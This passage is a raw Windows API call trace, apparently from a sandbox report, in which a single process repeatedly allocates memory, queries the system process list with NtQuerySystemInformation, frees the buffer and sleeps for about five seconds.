BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.695] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.716] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0248.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0248.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0248.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0248.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0248.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0248.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0248.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 